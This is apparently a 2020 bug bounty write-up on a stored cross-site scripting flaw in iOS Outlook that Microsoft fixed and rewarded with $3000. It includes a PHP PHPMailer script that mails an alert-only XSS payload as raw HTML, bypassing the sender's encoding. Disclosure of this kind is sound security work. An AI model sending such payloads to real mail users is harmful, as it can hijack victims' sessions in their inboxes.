iOS Outlook Stored XSS Write-Up ($3000)

kminthein
May 28, 2020 · 2 min read

Staying home is really a nightmare for me, and I am too bored to learn new things. So I decided to write a write-up about how I found a stored XSS in Microsoft Outlook and got a $3000 bounty.

I stopped hunting bugs about 3 years ago, after I got some bounties from Yahoo, Tumblr, etc. A few months ago, an old payload I had tested against Shopify popped up in my Microsoft Outlook email. So I started to dig around: I sent every XSS payload I had, including polyglots, to my Microsoft account, but nothing showed an alert. After hours of struggling, I reported to MSRC with the message below, lol. I thought I was an idiot.

And as expected, MSRC replied that they needed more info. I knew there was an XSS bug in Microsoft Outlook; I just hadn't found the endpoint. After thinking for some hours, I started to wonder: what if the sending email client was validating and encoding my payload? If my payload is normalized on the sender side, there is no way to reach the vulnerable point on the receiver side, which is Microsoft Outlook. So I decided to write a simple PHP script to send my message to Outlook.

The script I used to send the XSS payload to Outlook is below.

<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;

require 'vendor/autoload.php';

$mail = new PHPMailer(true); // true enables exceptions

try {
    // Server settings: authenticated SMTP submission through Gmail over STARTTLS
    $mail->SMTPDebug = 2;                 // verbose client/server output
    $mail->isSMTP();
    $mail->Host = 'smtp.gmail.com';
    $mail->SMTPAuth = true;
    $mail->Username = 'mymail@gmail.com'; // sending account
    $mail->Password = 'mypassword';       // its password (or app password)
    $mail->SMTPSecure = 'tls';            // STARTTLS
    $mail->Port = 587;

    // Recipients
    $mail->setFrom('mymail@gmail.com', 'kmt');
    $mail->addAddress('receiver@outlook.com', '');

    // Content: the body goes out as raw HTML, so nothing encodes the payload
    $mail->isHTML(true);
    $mail->Subject = 'XSS POC';
    $mail->Body = "<img src=x onerror=alert(1)>";

    $mail->send();
    echo 'Message has been sent';
} catch (Exception $e) {
    echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
}
?>

After firing the script and watching my Outlook mailbox: boom, XSS, and it seems Office 365 is also affected.

You can view the PoC video here.

After the bug was fixed, I was awarded $3000 by MSRC.

Conclusion

In the above scenario, I strongly believe my sender email client encoded my payload before sending it to Outlook, so the XSS in Outlook never triggered. That is why I chose to write a simple PHP script with PHPMailer.
